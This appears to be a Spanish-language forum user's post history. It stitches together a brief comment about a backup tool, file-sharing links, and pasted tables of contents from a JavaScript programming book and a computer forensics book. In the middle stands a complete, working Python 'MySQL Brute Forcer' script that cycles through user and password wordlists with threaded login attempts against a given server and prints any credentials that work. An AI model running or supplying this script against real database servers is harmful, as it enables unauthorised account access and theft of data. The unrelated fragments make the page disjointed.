Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
ANTRAX muy buen aporte.
Yo conocía el Cobian, pero éste pinta muy bueno.
Una pena que el nuevo theme no tenga "karma", pero si tiene salero y versión dark xDDD
Un saludo.
https://jumpshare.com/v/D19Dw6HIWsFxBOQ3i8Kk
#!usr/bin/python
#MySQL Brute Forcer
#You need the MySQLdb package found here:
#http://sourceforge.net/projects/mysql-python
import threading, time, random, sys
from copy import copy
try:
import MySQLdb
except(ImportError):
print "\nYou need the MySQLdb package found here: http://sourceforge.net/projects/mysql-python\n"
sys.exit(1)
if len(sys.argv) !=6:
print "Usage: ./mysqlbrute.py <server> <port> <database> <userlist> <wordlist>"
sys.exit(1)
try:
users = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[5], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com MySQLBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Port:",sys.argv[2]
print "[+] Database:",sys.argv[3]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
db=MySQLdb.connect(host=sys.argv[1],user=user,passwd=value,db=sys.argv[3],port=int(sys.argv[2]))
print "\t\nLogin successful:",value, user
db.close()
work.join()
sys.exit(2)
except(MySQLdb.Error), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
PART 1 PREPARING FOR TRAINING . ...............................1
1 Enter the ninja 3
1.1 The JavaScript libraries we'll be tapping 4
1.2 Understanding the JavaScript language 5
1.3 Cross-browser considerations 6
1.4 Current best practices 9
Current best practice: testing 9 ■ Current best practice:
performance analysis 10
1.5 Summary 11
2 Arming with testing and debugging 13
2.1 Debugging code 14
Logging 14 ■ Breakpoints 16
vi CONTENTS
2.2 Test generation 17
2.3 Testing frameworks 19
QUnit 21 ■ YUI Test 22 ■ JsUnit 22
Newer unit-testing frameworks 22
2.4 The fundamentals of a test suite 22
The assertion 23 ■ Test groups 24 ■ Asynchronous testing 25
2.5 Summary 27
PART 2 APPRENTICE TRAINING.....................................29
3 Functions are fundamental 31
3.1 What's with the functional difference? 32
Why is JavaScript's functional nature important? 33
Sorting with a comparator 37
3.2 Declarations 40
Scoping and functions 43
3.3 Invocations 46
From arguments to function parameters 47 ■ Invocation as
a function 49 ■ Invocation as a method 50 ■ Invocation as
a constructor 52 ■ Invocation with the apply() and
call() methods 54
3.4 Summary 58
4 Wielding functions 61
4.1 Anonymous functions 62
4.2 Recursion 64
Recursion in named functions 64 ■ Recursion with methods 65
The pilfered reference problem 66 ■ Inline named functions 68
The callee property 70
4.3 Fun with function as objects 71
Storing functions 72 ■ Self-memoizing functions 73
Faking array methods 76
4.4 Variable-length argument lists 77
Using apply() to supply variable arguments 77
Function overloading 79
4.5 Checking for functions 86
4.6 Summary 88
CONTENTS vii
5 Closing in on closures 89
5.1 How closures work 90
5.2 Putting closures to work 94
Private variables 94 ■ Callbacks and timers 96
5.3 Binding function contexts 99
5.4 Partially applying functions 103
5.5 Overriding function behavior 106
Memoization 106 ■ Function wrapping 109
5.6 Immediate functions 111
Temporary scope and private variables 112 ■ Loops 115
Library wrapping 117
5.7 Summary 118
6 Object-orientation with prototypes 119
6.1 Instantiation and prototypes 120
Object instantiation 120 ■ Object typing via constructors 127
Inheritance and the prototype chain 128
HTML DOM prototypes 133
6.2 The gotchas! 135
Extending Object 135 ■ Extending Number 136
Subclassing native objects 137 ■ Instantiation issues 139
6.3 Writing class-like code 143
Checking for function serializability 146 ■ Initialization
of subclasses 147 ■ Preserving super-methods 148
6.4 Summary 150
7 Wrangling regular expressions 151
7.1 Why regular expressions rock 152
7.2 A regular expression refresher 153
Regular expressions explained 153 ■ Terms and operators 154
7.3 Compiling regular expressions 158
7.4 Capturing matching segments 161
Performing simple captures 161 ■ Matching using
global expressions 162 ■ Referencing captures 163
Non-capturing groups 165
7.5 Replacing using functions 166
viii CONTENTS
7.6 Solving common problems with regular expressions 168
Trimming a string 168 ■ Matching newlines 170
Unicode 171 ■ Escaped characters 172
7.7 Summary 172
8 Taming threads and timers 175
8.1 How timers and threading work 176
Setting and clearing timers 176 ■ Timer execution within
the execution thread 177 ■ Differences between timeouts
and intervals 179
8.2 Minimum timer delay and reliability 180
8.3 Dealing with computationally expensive processing 183
8.4 Central timer control 186
8.5 Asynchronous testing 189
8.6 Summary 190
PART 3 NINJA TRAINING ............................................191
9 Ninja alchemy: runtime code evaluation 193
9.1 Code evaluation mechanisms 194
Evaluation with the eval() method 194 ■ Evaluation via the
Function constructor 197 ■ Evaluation with timers 197
Evaluation in the global scope 198 ■ Safe code evaluation 199
9.2 Function "decompilation" 201
9.3 Code evaluation in action 204
Converting JSON 204 ■ Importing namespaced code 205
JavaScript compression and obfuscation 206 ■ Dynamic
code rewriting 208 ■ Aspect-oriented script tags 209
Metalanguages and DSLs 210
9.4 Summary 213
10 With statements 215
10.1 What's with "with"? 216
Referencing properties within a with scope 216 ■ Assignments
within a with scope 218 ■ Performance considerations 219
10.2 Real-world examples 221
10.3 Importing namespaced code 223
CONTENTS ix
10.4 Testing 223
10.5 Templating with "with" 224
10.6 Summary 227
11 Developing cross-browser strategies 229
11.1 Choosing which browsers to support 230
11.2 The five major development concerns 231
Browser bugs and differences 232 ■ Browser bug fixes 233
Living with external code and markup 234
Missing features 239 ■ Regressions 240
11.3 Implementation strategies 242
Safe cross-browser fixes 242 ■ Object detection 243
Feature simulation 245 ■ Untestable browser issues 247
11.4 Reducing assumptions 249
11.5 Summary 251
12 Cutting through attributes, properties, and CSS 253
12.1 DOM attributes and properties 255
Cross-browser naming 256 ■ Naming restrictions 257
Differences between XML and HTML 257 ■ Behavior of
custom attributes 258 ■ Performance considerations 258
12.2 Cross-browser attribute issues 262
DOM id/name expansion 262 ■ URL normalization 264
The style attribute 265 ■ The type attribute 265
The tab index problem 266 ■ Node names 267
12.3 Styling attribute headaches 267
Where are my styles? 268 ■ Style property naming 270
The float style property 271 ■ Conversion of pixel values 271
Measuring heights and widths 272 ■ Seeing through
opacity 276 ■ Riding the color wheel 279
12.4 Fetching computed styles 282
12.5 Summary 285
PART 4 MASTER TRAINING.........................................287
13 Surviving events 289
13.1 Binding and unbinding event handlers 290
13.2 The Event object 294
x CONTENTS
13.3 Handler management 297
Centrally storing associated information 298
Managing event handlers 300
13.4 Triggering events 309
Custom events 310
13.5 Bubbling and delegation 315
Delegating events to an ancestor 315 ■ Working around
browser deficiencies 316
13.6 The document ready event 324
13.7 Summary 326
14 Manipulating the DOM 329
14.1 Injecting HTML into the DOM 330
Converting HTML to DOM 331 ■ Inserting into
the document 334 ■ Script execution 336
14.2 Cloning elements 338
14.3 Removing elements 340
14.4 Text contents 341
Setting text 342 ■ Getting text 343
14.5 Summary 344
15 CSS selector engines 345
15.1 The W3C Selectors API 347
15.2 Using XPath to find elements 349
15.3 The pure-DOM implementation 351
Parsing the selector 353 ■ Finding the elements 354
Filtering the set 355 ■ Recursing and merging 356
Bottom-up selector engine 357
15.4 Summary 359
https://jumpshare.com/v/rJXhwuiOvGtquVj6sOGw
1 The Forensics Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5Types of Investigations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
The Role of the Investigator . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Elements of a Good Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
Cross-validation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
Proper Evidence Handling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Completeness of Investigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Management of Archives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Technical Competency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Explicit Defi nition and Justifi cation for the Process . . . . . . . . . . . . . . 14
Legal Compliance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Flexibility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
Defi ning a Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
Identifi cation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15
00-FM.indd xi 8/23/2009 3:54:44 AM
xii Hacking Exposed Computer Forensics
Collection and Preservation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Production and Presentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
After the Investigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
▼ 2 Computer Fundamentals . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
The Bottom-up View of a Computer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
It's All Just 1s and 0s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20
Learning from the Past: Giving Computers Memory . . . . . . . . . . . . . 22
Basic Input and Output System (BIOS) . . . . . . . . . . . . . . . . . . . . . . . . . 24
The Operating System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
The Applications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Types of Media . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
Magnetic Media . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
Optical Media . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
Memory Technologies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
▼ 3 Forensic Lab Environment Preparation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
The Ultimate Computer Forensic Lab . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
What Is a Computer Forensic Laboratory? . . . . . . . . . . . . . . . . . . . . . . 42
Forensic Lab Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
Protecting the Forensic Lab . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
Forensic Computers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
Components of a Forensic Host . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
Commercially Available Hardware Systems . . . . . . . . . . . . . . . . . . . . 51
Do-It-Yourself Hardware Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
Data Storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
Forensic Hardware and Software Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
Using Hardware Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
Using Software Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
The Flyaway Kit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55
Case Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
Bonus: Linux or Windows? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
Part II Collecting the Evidence
Case Study: The Collections Agency . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
Preparations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
Revelations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
Collecting Evidence . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
▼ 4 Forensically Sound Evidence Collection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 63
Collecting Evidence from a Single System . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
Step 1: Power Down the Suspect System . . . . . . . . . . . . . . . . . . . . . . . 65
00-FM.indd xii 8/23/2009 3:54:44 AM
Contents xiii
Step 2: Remove the Drive(s) from the Suspect System . . . . . . . . . . . . 65
Step 3: Check for Other Media . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
Step 4: Record BIOS Information . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
Step 5: Forensically Image the Drive . . . . . . . . . . . . . . . . . . . . . . . . . . . 66
Step 6: Record Cryptographic Hashes . . . . . . . . . . . . . . . . . . . . . . . . . . 92
Step 7: Bag and Tag . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
Move Forward . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
Common Mistakes in Evidence Collection . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
▼ 5 Remote Investigations and Collections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
Privacy Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98
Remote Investigations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99
Remote Investigation Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
Remote Collections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
Remote Collection Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113
The Data Is Changing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
Policies and Procedures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
Encrypted Volumes or Drives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
USB Thumb Drives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 125
Part III Forensic Investigation Techniques
Case Study: Analyzing the Data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Digging for Clues . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
We're Not Done. Yet. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
Finally . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
▼ 6 Microsoft Windows Systems Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
Windows File Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
Master Boot Record . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
FAT File System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132
NTFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
Recovering Deleted Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138
Limitations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149
Windows Artifacts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
▼ 7 Linux Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
The Linux File System (ext2 and ext3) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
ext2 Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162
ext3/ext4 Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 165
Linux Swap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166
Linux Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166
00-FM.indd xiii 8/23/2009 3:54:44 AM
xiv Hacking Exposed Computer Forensics
▼ 8 Macintosh Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
The Evolution of the Mac OS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 176
Looking at a Mac Disk or Image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178
The GUID Partition Table . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179
Partition Entry Array . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 180
Deleted Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
Recovering Deleted Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Concatenating Unallocated Space . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
Scavenging for Unindexed Files and Pruned Nodes . . . . . . . . . . . . . 190
A Closer Look at Macintosh Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
Archives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
Date and Time Stamps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
E-mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
Graphics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Web Browsing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 193
Virtual Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
System Log and Other System Files . . . . . . . . . . . . . . . . . . . . . . . . . . . 194
Mac as a Forensics Platform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 195
▼ 9 Defeating Anti-forensic Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 197
Obscurity Methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 198
Privacy Measures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 205
Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 205
The General Solution to Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Wiping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212
▼ 10 Enterprise Storage Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 221
The Enterprise Data Universe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222
Rebuilding RAIDs in EnCase . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 223
Rebuilding RAIDs in Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 223
Working with NAS Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224
Working with SAN Systems . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 225
Working with Tapes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 226
Accessing Raw Tapes on Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227
Accessing Raw Tapes on UNIX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 228
Commercial Tools for Accessing Tapes . . . . . . . . . . . . . . . . . . . . . . . . . 229
Collecting Live Data from Windows Systems . . . . . . . . . . . . . . . . . . . 231
Full-Text Indexing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 231
Mail Servers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234
▼ 11 E-mail Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 239
Finding E-mail Artifacts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240
Converting E-mail Formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
Obtaining Web-based E-mail (Webmail) from Online Sources . . . . . . . . . . . 241
00-FM.indd xiv 8/23/2009 3:54:44 AM
Contents xv
Client-based E-mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Web-Based E-mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 261
Internet-Hosted Mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 261
Investigating E-mail Headers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
▼ 12 Tracking User Activity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273
Microsoft Offi ce Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
Tracking Web Usage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283
Internet Explorer Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283
Firefox/Mozilla Forensics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 291
Operating System User Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
UserAssist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 298
▼ 13 Forensic Analysis of Mobile Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303
Collecting and Analyzing Mobile Device Evidence . . . . . . . . . . . . . . . . . . . . 305
Password-protected Windows Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 331
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 338
Part IV Presenting Your Findings
Case Study: Wrapping Up the Case . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340
He Said, She Said... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 340
▼ 14 Documenting the Investigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 341
Read Me . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 342
Internal Report . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
Construction of an Internal Report . . . . . . . . . . . . . . . . . . . . . . . . . . . . 344
Declaration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
Construction of a Declaration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 347
Affi davit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 350
Expert Report . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 351
Construction of an Expert Report . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 352
▼ 15 The Justice System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 357
The Criminal Court System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 358
The Civil Justice System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 359
Phase One: Investigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
Phase Two: Commencing Suit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
Phase Three: Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361
Phase Four: Trial . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
Expert Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
Expert Credentials . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
Nontestifying Expert Consultant . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
Testifying Expert Witness . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
00-FM.indd xv 8/23/2009 3:54:44 AM
xvi Hacking Exposed Computer Forensics
Court-Appointed Expert . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
Expert Interaction with the Court . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 365
Part V Putting It All Together
Case Study: Now What? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
Mr. Blink Becomes an Investigator . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
Time to Understand the Business Issues . . . . . . . . . . . . . . . . . . . . . . . . 368
▼ 16 IP Theft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 369
What Is IP Theft? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
IP Theft Ramifi cations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
Loss of Customers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
Loss of Competitive Advantage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
Monetary Loss . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
Types of Theft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 373
Technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
Tying It Together . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389
What Was Taken? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 389
Looking at Intent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 390
Estimating Damages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 390
Working with Higher-Ups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Working with Outside Counsel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 392
▼ 17 Employee Misconduct . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 393
What Is Employee Misconduct? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 394
Ramifi cations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 395
Disruptive Work Environment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 395
Investigations by Authorities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396
Lawsuits Against an Employer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396
Monetary Loss . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 397
Types of Misconduct . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
Inappropriate Use of Corporate Resources . . . . . . . . . . . . . . . . . . . . . 399
Making Sense of It All . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402
Employment Discrimination/Harassment . . . . . . . . . . . . . . . . . . . . . . 404
Violation of Non-compete/Non-solicitation Agreements . . . . . . . . . 407
Tying It Together . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
What Is the Risk to the Company? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
Looking at Intent . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
Estimating Damages . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
Working with Higher-Ups . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
Working with Outside Counsel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 415
